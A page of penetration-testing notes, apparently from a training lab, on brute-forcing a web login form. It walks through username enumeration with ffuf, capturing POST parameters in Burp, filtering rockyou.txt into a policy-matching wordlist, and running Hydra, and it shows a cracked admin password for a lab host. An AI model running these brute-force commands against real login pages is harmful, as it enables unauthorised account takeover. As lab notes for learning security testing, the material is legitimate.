HYDRA

01.USER ENUMERATION

#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output

#after identifying valid usernames, proceed by attempting to brute-force the user's password

02.IDENTIFY ERROR MESSAGE

root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * send expected output
 
#identified incorrect credential message
 * unknown user
 * invalid credentials

03.IDENTIFY POST PARAMETERS

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the expected user input
 

POST /index.php HTTP/1.1
Host: 83.136.254.158:51572
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

username=test&password=test
 * identified post parameters as username=x&password=x

04.CRAFT CUSTOM PWLIST

#tailor the password to the organization's password list (if known)
 Minimum Length: 10 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
 
#
root@oco:~$ cp /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt .
root@oco:~$ wc -l rockyou.txt
 * 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
root@oco:~$ wc -l customPWList.txt
 * 151647

05.IMPLEMENTATION

root@oco:~$ hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

#analyze the form's structure & behavior to identify the parameter to use
root@htb:~$ BROWSER > {targetSite:Port} > Right-Click > View Page Source
 * ALT: curl -v {targetSite:Port}
 * ALT: Browser Dev Tools > Network Tab
    - find the request corresponding to the form submission and check the form data, headers, and the server’s response
 * ALT: Burp Suite
 
 * identified parameter info
    - The POST method indicates that data is being sent to the server to create or update a resource
    - username and password

#provide invalid input to identify failure or success conditions
root@htb:~$ BROWSER > {targetSite:Port}
 username field: admin
 password field: password 

#construct the params string and condition string
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 94.237.59.180 -s 55833 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials" -t 64
 * the -f option will stop hydra after the first successful login
 * the -s option is used to specify an alternative port
 * the -t option identifies the number of parallel threads to use; default 16

 * [55833][http-post-form] host: 94.237.59.180   login: admin   password: zxcvbnm

#crafting the correct params string is crucial for a successful Hydra attack
  - Hydra's http-post-form service is specifically designed to target login forms. It enables the automation of POST requests, dynamically inserting username and password combinations into the request body. In hydra's http-post-form module, success and failure conditions are crucial for properly identifying valid and invalid login attempts. 
     - the F= determines when a login attempt has failed
        - the failure condition checks for a specific string in the server's response
	   - e.g., 'invalid username or password'
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
     - the S= indicates when a login is successful
        - the success condition also checks for a specific string in the server's response
	   - e.g., '302 or dashboard or welcome'
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
	
root@oco:~$ BROWSER > {targetSite:port}
 admin:zxcvbnm

PreviousWEB LOGIN FORMS NextFFUF

Last updated 1 month ago